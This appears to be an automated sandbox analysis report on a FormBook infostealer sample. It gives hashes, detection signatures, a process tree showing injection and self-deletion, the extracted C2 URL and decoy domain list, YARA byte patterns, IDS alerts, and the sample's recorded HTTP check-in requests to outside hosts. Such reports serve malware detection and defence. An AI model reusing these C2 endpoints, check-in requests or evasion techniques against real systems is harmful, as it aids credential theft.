Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SKlGhwkzTi

Overview

General Information

Sample Name:SKlGhwkzTi (renamed file extension from none to exe)
Analysis ID:432735
MD5:8252e0bd8e579259cc18ceae0c5c6d64
SHA1:242c3feb78e57de5c30b6f4f6b6d5d9b3332eb08
SHA256:21b3aba425cfa96bd3c5db2b306591a3a2aa1c8ee6fbdeddfdf60b5e1c0df0ea
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SKlGhwkzTi.exe (PID: 6896 cmdline: 'C:\Users\user\Desktop\SKlGhwkzTi.exe' MD5: 8252E0BD8E579259CC18CEAE0C5C6D64)
    • SKlGhwkzTi.exe (PID: 4484 cmdline: C:\Users\user\Desktop\SKlGhwkzTi.exe MD5: 8252E0BD8E579259CC18CEAE0C5C6D64)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 6296 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 7140 cmdline: /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.SKlGhwkzTi.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.SKlGhwkzTi.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.SKlGhwkzTi.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.SKlGhwkzTi.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.SKlGhwkzTi.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: adultpeace.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SKlGhwkzTi.exeVirustotal: Detection: 31%Perma Link
          Source: SKlGhwkzTi.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SKlGhwkzTi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SKlGhwkzTi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmp, help.exe, 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKlGhwkzTi.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.hiddenwholesale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.biztekno.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.21.65.7 104.21.65.7
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.hiddenwholesale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.biztekno.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.hiddenwholesale.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.679283133.0000000002DE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.716763832.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: help.exe, 0000000D.00000002.919483231.0000000004052000.00000004.00000001.sdmpString found in binary or memory: https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
